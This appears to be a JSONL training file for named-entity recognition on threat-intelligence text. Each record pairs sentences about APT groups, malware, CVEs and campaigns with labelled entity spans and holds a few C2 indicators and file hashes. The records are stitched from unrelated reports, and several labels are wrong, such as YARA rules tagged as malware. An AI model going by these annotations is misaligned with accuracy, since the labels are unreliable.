{"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions . In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., ) . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"MALWARE: XLoader": [[14, 21]], "MALWARE: FakeSpy": [[26, 33]], "THREAT_ACTOR: APT28": [[135, 140]], "FILEPATH: cmd.exe": [[267, 274]], "MALWARE: Glimpse": [[277, 284]], "MALWARE: COSMICENERGY": [[437, 449]]}, "info": {"id": "cyberner_stix_train_000846", "source": "cyberner_stix_train"}}
{"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background . It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"MALWARE: TrickMo": [[16, 23]], "THREAT_ACTOR: Callisto": [[306, 314]], "FILEPATH: cmd.exe": [[479, 486]]}, "info": {"id": "cyberner_stix_train_000847", "source": "cyberner_stix_train"}}
{"text": ". Silence attacked financial organisations in the UK . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets .", "spans": {"THREAT_ACTOR: Silence": [[2, 9]], "ORGANIZATION: financial": [[19, 28]], "THREAT_ACTOR: Cobalt Group": [[97, 109]], "TOOL: C&C": [[145, 148]], "MALWARE: Cobalt Strike": [[160, 173]]}, "info": {"id": "cyberner_stix_train_000848", "source": "cyberner_stix_train"}}
{"text": "Note : TERBIUM establishes a foothold throughout the organization and does not proceed with the destructive wiping operation until a specific date/time : November 17 , 2016 at 8:45 p.m . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": {"THREAT_ACTOR: TERBIUM": [[7, 14]], "MALWARE: .doc files": [[241, 251]], "FILEPATH: RTF documents": [[272, 285]], "VULNERABILITY: exploit": [[302, 309]], "VULNERABILITY: CVE-2017-8570": [[310, 323]], "TOOL: Composite Moniker": [[326, 343]]}, "info": {"id": "cyberner_stix_train_000849", "source": "cyberner_stix_train"}}
{"text": "These two documents shared multiple data artifacts , such as a shared C2 IP , shared author name , and shared tactics .", "spans": {"TOOL: C2": [[70, 72]]}, "info": {"id": "cyberner_stix_train_000850", "source": "cyberner_stix_train"}}
{"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"MALWARE: VBS file": [[114, 122]], "MALWARE: INI file": [[130, 138]], "THREAT_ACTOR: Lotus Blossom": [[141, 154]], "VULNERABILITY: exploit": [[173, 180]], "VULNERABILITY: CVE-2014-6332": [[181, 194]], "MALWARE: Emissary Trojan": [[227, 242]]}, "info": {"id": "cyberner_stix_train_000851", "source": "cyberner_stix_train"}}
{"text": "] com , lending further credence the remaining two domains , gooledriveservice [ . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . We assess APT33 works at the behest of the Iranian government .", "spans": {"THREAT_ACTOR: BalkanDoor": [[117, 127]], "VULNERABILITY: CVE-2018-20250": [[217, 231]], "THREAT_ACTOR: APT33": [[244, 249]]}, "info": {"id": "cyberner_stix_train_000852", "source": "cyberner_stix_train"}}
{"text": "Customized evasion based on victim profile – The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems .", "spans": {"TOOL: Customized evasion based on victim profile": [[0, 42]]}, "info": {"id": "cyberner_stix_train_000853", "source": "cyberner_stix_train"}}
{"text": "To traverse the firewall , C2 traffic for most TG-3390 tools occurs over ports 53 , 80 , and 443 .", "spans": {"TOOL: firewall": [[16, 24]], "TOOL: C2": [[27, 29]], "THREAT_ACTOR: TG-3390": [[47, 54]]}, "info": {"id": "cyberner_stix_train_000854", "source": "cyberner_stix_train"}}
{"text": "We identified campaigns targeting Thai users and their devices . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios . In some cases , the compromised servers are hosted on target organizations ’ networks after successful infiltration so the attackers can increase their control of the victims ’ infrastructure . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"TOOL: Winnti": [[103, 109]], "TOOL: BARIUM": [[116, 122]], "TOOL: LEAD": [[127, 131]], "ORGANIZATION: victims": [[405, 412]], "TOOL: NetSupport RAT": [[461, 475]]}, "info": {"id": "cyberner_stix_train_000855", "source": "cyberner_stix_train"}}
{"text": "First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": {}, "info": {"id": "cyberner_stix_train_000856", "source": "cyberner_stix_train"}}
{"text": "These ransomware payloads only seem to target Korean systems , since they won’t execute if the system language is not Korean . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"TOOL: ransomware": [[6, 16]], "MALWARE: Carbanak": [[147, 155]], "THREAT_ACTOR: criminals": [[222, 231]], "ORGANIZATION: financial industry": [[272, 290]], "ORGANIZATION: customers": [[314, 323]]}, "info": {"id": "cyberner_stix_train_000857", "source": "cyberner_stix_train"}}
{"text": "In 2015 , Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in India .", "spans": {"THREAT_ACTOR: Suckfly": [[10, 17]]}, "info": {"id": "cyberner_stix_train_000858", "source": "cyberner_stix_train"}}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "THREAT_ACTOR: Barium": [[143, 149]], "MALWARE: Win32/Barlaiy": [[185, 198]], "MALWARE: Win32/PlugX.L": [[229, 242]]}, "info": {"id": "cyberner_stix_train_000859", "source": "cyberner_stix_train"}}
{"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world . Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service . The final payload of the July 2023 campaign is njRAT , which increases our confidence that the threat actor 's goals are information stealing and remote control of the targeted systems .", "spans": {"ORGANIZATION: embassies": [[202, 211]], "TOOL: Svchost": [[260, 267]], "TOOL: ServiceDLL": [[397, 407]], "MALWARE: njRAT": [[526, 531]]}, "info": {"id": "cyberner_stix_train_000860", "source": "cyberner_stix_train"}}
{"text": "Name winexesvc.exe Size 23552 MD5 77e7fb6b56c3ece4ef4e93b6dc608be0 SHA1 f46f84e53263a33e266aae520cb2c1bd0a73354e SHA256 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d .", "spans": {"FILEPATH: winexesvc.exe": [[5, 18]], "FILEPATH: 77e7fb6b56c3ece4ef4e93b6dc608be0": [[34, 66]], "FILEPATH: f46f84e53263a33e266aae520cb2c1bd0a73354e": [[72, 112]], "FILEPATH: 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d": [[120, 184]]}, "info": {"id": "cyberner_stix_train_000861", "source": "cyberner_stix_train"}}
{"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; The first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": {"TOOL: ransomware": [[92, 102]], "TOOL: Samas": [[145, 150]], "TOOL: SamSam": [[157, 163]], "VULNERABILITY: exploit": [[242, 249]], "THREAT_ACTOR: APT28": [[303, 308]]}, "info": {"id": "cyberner_stix_train_000862", "source": "cyberner_stix_train"}}
{"text": "] somtum [ . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries . Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": {"THREAT_ACTOR: Mofang": [[54, 60]], "ORGANIZATION: government": [[123, 133]], "ORGANIZATION: military": [[136, 144]], "ORGANIZATION: critical infrastructure": [[147, 170]], "ORGANIZATION: automotive": [[179, 189]], "ORGANIZATION: weapon industries": [[194, 211]]}, "info": {"id": "cyberner_stix_train_000863", "source": "cyberner_stix_train"}}
{"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"MALWARE: Android infostealer": [[108, 127]], "MALWARE: backdoor": [[134, 142]], "FILEPATH: ChopShop1": [[233, 242]], "ORGANIZATION: MITRE Corporation": [[279, 296]]}, "info": {"id": "cyberner_stix_train_000864", "source": "cyberner_stix_train"}}
{"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named “ HenBox ” masquerading as a variety of legitimate Android apps . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"MALWARE: HenBox": [[0, 6], [136, 142]], "SYSTEM: Android": [[102, 109], [185, 192]], "ORGANIZATION: Talos": [[200, 205]], "THREAT_ACTOR: gang": [[332, 336]], "ORGANIZATION: governments": [[420, 431]]}, "info": {"id": "cyberner_stix_train_000865", "source": "cyberner_stix_train"}}
{"text": "The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on the system .", "spans": {"TOOL: base64 encoded content": [[4, 26]], "TOOL: Pastebin": [[47, 55]]}, "info": {"id": "cyberner_stix_train_000866", "source": "cyberner_stix_train"}}
{"text": "In the areas marked ‘ { text } ’ Rotexy displays the text it receives from the C & C . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"MALWARE: Rotexy": [[33, 39]], "TOOL: RTLO technique": [[194, 208]], "MALWARE: decoy documents": [[228, 243]], "THREAT_ACTOR: Leviathan": [[279, 288]], "ORGANIZATION: maritime industries": [[319, 338]], "ORGANIZATION: naval defense contractors": [[341, 366]], "ORGANIZATION: research institutions": [[384, 405]]}, "info": {"id": "cyberner_stix_train_000867", "source": "cyberner_stix_train"}}
{"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise .", "spans": {"SYSTEM: Microsoft Windows": [[102, 119]], "SYSTEM: Apple iOS": [[124, 133]], "MALWARE: Okrum malware": [[232, 245]], "MALWARE: Ketrican backdoors": [[262, 280]], "ORGANIZATION: Korea Hydro & Nuclear Power Co.compromise": [[377, 418]]}, "info": {"id": "cyberner_stix_train_000868", "source": "cyberner_stix_train"}}
{"text": "Hunter — A web application scanning tool written by @tojen to identify vulnerabilities in Apache Tomcat , Red Hat JBoss Middleware , and Adobe ColdFusion .", "spans": {"TOOL: Hunter": [[0, 6]], "TOOL: Apache Tomcat": [[90, 103]], "TOOL: Red Hat JBoss Middleware": [[106, 130]], "TOOL: Adobe ColdFusion": [[137, 153]]}, "info": {"id": "cyberner_stix_train_000869", "source": "cyberner_stix_train"}}
{"text": "] addroider.com ’ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"THREAT_ACTOR: attackers": [[57, 66]], "ORGANIZATION: banks": [[155, 160]], "ORGANIZATION: government organizations": [[236, 260]]}, "info": {"id": "cyberner_stix_train_000870", "source": "cyberner_stix_train"}}
{"text": "Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems .", "spans": {"THREAT_ACTOR: Outlaw": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000871", "source": "cyberner_stix_train"}}
{"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 . Currently malware with the obfuscations is limited , We would also like to thank Trellix for our continued partnership and for providing supporting detection YARA rules and associated indicators .", "spans": {"THREAT_ACTOR: Ke3chang": [[170, 178]], "THREAT_ACTOR: attackers": [[179, 188]], "ORGANIZATION: Trellix": [[340, 347]], "MALWARE: YARA rules": [[417, 427]]}, "info": {"id": "cyberner_stix_train_000872", "source": "cyberner_stix_train"}}
{"text": "Translate on the fly the objects the server send to mirrored matching client objects ( will not work if client doesn’t have this object , or renamed it ) .", "spans": {}, "info": {"id": "cyberner_stix_train_000873", "source": "cyberner_stix_train"}}
{"text": "The big first buffer is used as index for multiple concurrent threads . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report . Thus , we do not know the exact purpose of this malicious service . The log messages recorded in the nslog can include connection statistics for SSLVPN and ICA proxy sessions .", "spans": {"TOOL: Elise backdoor": [[102, 116]], "SYSTEM: SSLVPN": [[312, 318]], "SYSTEM: ICA proxy": [[323, 332]]}, "info": {"id": "cyberner_stix_train_000874", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //www [ . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Carbon Black product specific content can be located in the User Exchange . certutil.exe", "spans": {"THREAT_ACTOR: group": [[27, 32]], "VULNERABILITY: Flash exploits": [[76, 90]], "TOOL: Carberp": [[108, 115]], "TOOL: JHUHUGIT downloaders": [[122, 142]], "ORGANIZATION: Carbon Black": [[175, 187]], "TOOL: User Exchange": [[235, 248]], "TOOL: certutil.exe": [[251, 263]]}, "info": {"id": "cyberner_stix_train_000875", "source": "cyberner_stix_train"}}
{"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse . Attackers then moved on to the motor industry in late May .", "spans": {"THREAT_ACTOR: PLATINUM": [[17, 25]], "ORGANIZATION: motor industry": [[162, 176]]}, "info": {"id": "cyberner_stix_train_000876", "source": "cyberner_stix_train"}}
{"text": "It is now clear that after being implicated in the U.S. presidential election attacks in late 2016 , APT28 was undeterred by the resulting publicity and continues to mount further attacks using its existing tools .", "spans": {"ORGANIZATION: presidential election": [[56, 77]], "THREAT_ACTOR: APT28": [[101, 106]]}, "info": {"id": "cyberner_stix_train_000877", "source": "cyberner_stix_train"}}
{"text": "These vulnerabilities include :", "spans": {}, "info": {"id": "cyberner_stix_train_000878", "source": "cyberner_stix_train"}}
{"text": "Application of the data remains challenging , and so to continue our initiative of establishing playbooks for adversary groups , we have added this attack campaign as the next playbook in our dataset .", "spans": {}, "info": {"id": "cyberner_stix_train_000879", "source": "cyberner_stix_train"}}
{"text": "ESET researchers analyze new TTPs attributed to the Turla group that leverage PowerShell to run malware in-memory only . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[52, 57]], "TOOL: PowerShell": [[78, 88]], "SYSTEM: Windows": [[225, 232]], "MALWARE: HIGHNOON": [[257, 265]], "MALWARE: SOGU backdoors": [[270, 284]], "THREAT_ACTOR: APT41": [[287, 292], [520, 525], [685, 690], [768, 773]], "MALWARE: Sticky Keys": [[550, 561]], "MALWARE: scheduled tasks": [[578, 593]], "MALWARE: bootkits": [[596, 604]], "MALWARE: rootkits": [[607, 615]], "MALWARE: registry modifications": [[618, 640]], "MALWARE: ROCKBOOT": [[701, 709]], "TOOL: Server Message Block": [[878, 898]], "TOOL: (SMB)": [[899, 904]]}, "info": {"id": "cyberner_stix_train_000880", "source": "cyberner_stix_train"}}
{"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 . you should read his blog post . Continual education for employees to spot phishing attacks is also a key , basic measure with todays threat landscape .", "spans": {"ORGANIZATION: financial sanctions": [[465, 484]], "THREAT_ACTOR: APT38": [[546, 551]]}, "info": {"id": "cyberner_stix_train_000881", "source": "cyberner_stix_train"}}
{"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted . The response of the initial sent packet knock contains some commands to be executed on the victim machine", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[213, 233]], "TOOL: Cobalt Strike": [[355, 368]], "TOOL: MMAT_GLBOPT2": [[418, 430]], "ORGANIZATION: victim machine": [[596, 610]]}, "info": {"id": "cyberner_stix_train_000882", "source": "cyberner_stix_train"}}
{"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group , a group that targets government interests in the region .", "spans": {"THREAT_ACTOR: Gaza Cybergang group": [[59, 79]]}, "info": {"id": "cyberner_stix_train_000883", "source": "cyberner_stix_train"}}
{"text": "Take a screenshot of any app in foreground . The group 's targets include a number of organizations and individuals located in Russia . The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted Palestinians . Researchers at Akamai reported on a Magecart skimmer campaign disguised as Google Tag Manager that also made the news with the compromise of one of Canada 's largest liquor store ( LCBO ) .", "spans": {"ORGANIZATION: Akamai": [[363, 369]], "TOOL: Google Tag Manager": [[423, 441]], "ORGANIZATION: Canada 's largest liquor store ( LCBO )": [[496, 535]]}, "info": {"id": "cyberner_stix_train_000884", "source": "cyberner_stix_train"}}
{"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher ’ s anti-sandbox checks . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 . The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": {"SYSTEM: Office 365 ATP": [[46, 60]], "MALWARE: FinFisher": [[79, 88]], "TOOL: DLL": [[214, 217]], "TOOL: LZMA": [[284, 288]], "TOOL: RC4": [[310, 313]], "VULNERABILITY: reused code associated with the cyber range to develop this malware": [[456, 523]]}, "info": {"id": "cyberner_stix_train_000885", "source": "cyberner_stix_train"}}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "VULNERABILITY: exploit": [[248, 255]], "ORGANIZATION: Microsoft": [[264, 273], [377, 386]], "SYSTEM: Windows": [[274, 281], [387, 394]], "TOOL: OLE Remote Code Execution": [[282, 307]], "VULNERABILITY: Vulnerability": [[308, 321]], "VULNERABILITY: CVE-2014-6332": [[324, 337]]}, "info": {"id": "cyberner_stix_train_000886", "source": "cyberner_stix_train"}}
{"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91.230.121.144 remserver.ddns.net . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: CTU": [[183, 186]], "THREAT_ACTOR: NICKEL ACADEMY": [[236, 250]], "THREAT_ACTOR: APT33": [[298, 303]], "IP_ADDRESS: 91.230.121.144": [[306, 320]], "DOMAIN: remserver.ddns.net": [[321, 339]], "THREAT_ACTOR: Hack520": [[394, 401]]}, "info": {"id": "cyberner_stix_train_000887", "source": "cyberner_stix_train"}}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "SYSTEM: Windows": [[346, 353]], "FILEPATH: KBDLV2.DLL": [[400, 410]], "FILEPATH: AUTO.DLL": [[414, 422]]}, "info": {"id": "cyberner_stix_train_000888", "source": "cyberner_stix_train"}}
{"text": "The following tools appear to be exclusive to TG-3390 : OwaAuth web shell — A web shell and credential stealer deployed to Microsoft Exchange servers .", "spans": {"THREAT_ACTOR: TG-3390": [[46, 53]], "MALWARE: OwaAuth": [[56, 63]], "TOOL: web shell": [[64, 73], [78, 87]], "TOOL: stealer": [[103, 110]], "ORGANIZATION: Microsoft": [[123, 132]], "TOOL: Exchange": [[133, 141]]}, "info": {"id": "cyberner_stix_train_000889", "source": "cyberner_stix_train"}}
{"text": "60 % of devices containing or accessing enterprise data are mobile . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": {"ORGANIZATION: iSiGHT Partners": [[69, 84]], "THREAT_ACTOR: Sandworm Team": [[97, 110]], "VULNERABILITY: zero-day exploit": [[232, 248]], "VULNERABILITY: CVE-2014-4114": [[251, 264]], "MALWARE: RATs": [[277, 281]], "MALWARE: Poison Ivy-based malware": [[449, 473]]}, "info": {"id": "cyberner_stix_train_000890", "source": "cyberner_stix_train"}}
{"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"MALWARE: it": [[26, 28]], "THREAT_ACTOR: NEODYMIUM": [[165, 174]], "VULNERABILITY: CVE-2016-4117": [[200, 213]], "VULNERABILITY: exploit": [[214, 221]], "THREAT_ACTOR: PROMETHIUM": [[232, 242]]}, "info": {"id": "cyberner_stix_train_000891", "source": "cyberner_stix_train"}}
{"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the “ android.intent.action.BOOT_COMPLETED ” broadcast action and adding code that boots the application when the broadcast is fired . Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"TOOL: card credentials": [[271, 287]], "THREAT_ACTOR: actors": [[296, 302]], "MALWARE: Clayslide": [[485, 494]], "FILEPATH: OfficeServicesStatus.vbs file": [[514, 543]], "MALWARE: ISMAgent Clayslide document": [[557, 584]]}, "info": {"id": "cyberner_stix_train_000892", "source": "cyberner_stix_train"}}
{"text": "] com/aa hxxp : //nttdocomo-qar [ . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin . This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily . They choses the appropriate DLL by passing a flag in the first Argument .", "spans": {"ORGANIZATION: FireEye": [[79, 86]], "THREAT_ACTOR: group": [[116, 121]]}, "info": {"id": "cyberner_stix_train_000893", "source": "cyberner_stix_train"}}
{"text": "Distribution of victims . This , in turn , would provide access to a larger amount of intellectual property and sensitive data . OceanLotus : plan.evillese.com:8531 11b4 . Seven of the vulnerabilities included in today ’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": {"THREAT_ACTOR: OceanLotus": [[129, 139]], "DOMAIN: plan.evillese.com:8531": [[142, 164]]}, "info": {"id": "cyberner_stix_train_000894", "source": "cyberner_stix_train"}}
{"text": "All communication with the C2 is done over HTTP . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": {"TOOL: More_eggs": [[69, 78]], "THREAT_ACTOR: ITG08": [[89, 94]], "TOOL: Mimikatz": [[166, 174]], "THREAT_ACTOR: Group123": [[235, 243]], "MALWARE: HWP document": [[261, 273]], "MALWARE: NavRAT": [[338, 344]]}, "info": {"id": "cyberner_stix_train_000895", "source": "cyberner_stix_train"}}
{"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly . The links between CopyPaste and FIN7 are still very weak . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"ORGANIZATION: eBay": [[113, 117]], "ORGANIZATION: Amazon": [[121, 127]], "ORGANIZATION: Symantec": [[130, 138]], "THREAT_ACTOR: CopyPaste": [[272, 281]], "THREAT_ACTOR: FIN7": [[286, 290]], "MALWARE: SocGholish": [[346, 356]], "TOOL: Cobalt Strike": [[504, 517]], "TOOL: Mimikatz": [[521, 529]]}, "info": {"id": "cyberner_stix_train_000896", "source": "cyberner_stix_train"}}
{"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise ’ s certificate . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": {"VULNERABILITY: EternalBlue exploit": [[141, 160]], "TOOL: Petya": [[274, 279]], "TOOL: NotPetya": [[282, 290]], "ORGANIZATION: social engineering": [[352, 370]], "THREAT_ACTOR: MuddyWater": [[399, 409]]}, "info": {"id": "cyberner_stix_train_000897", "source": "cyberner_stix_train"}}
{"text": "At some point in his Google Play “ career ” , he apparently decided to increase his ad revenue by implementing adware functionality in his apps ’ code . One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"SYSTEM: Google Play": [[21, 32]], "MALWARE: ipv4.dll": [[167, 175]], "TOOL: downloader": [[232, 242]], "FILEPATH: 32-bit Windows executable file": [[321, 351]], "MALWARE: Remote Access Trojan": [[370, 390]], "MALWARE: RAT": [[393, 396]]}, "info": {"id": "cyberner_stix_train_000899", "source": "cyberner_stix_train"}}
{"text": "Two details about MiniDuke components are worth noting .", "spans": {"MALWARE: MiniDuke": [[18, 26]]}, "info": {"id": "cyberner_stix_train_000900", "source": "cyberner_stix_train"}}
{"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational . Japan is no stranger to banking malware . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": {"MALWARE: banking": [[155, 162]], "MALWARE: malware": [[163, 170]], "MALWARE: unsophisticated technical merit": [[201, 232]]}, "info": {"id": "cyberner_stix_train_000901", "source": "cyberner_stix_train"}}
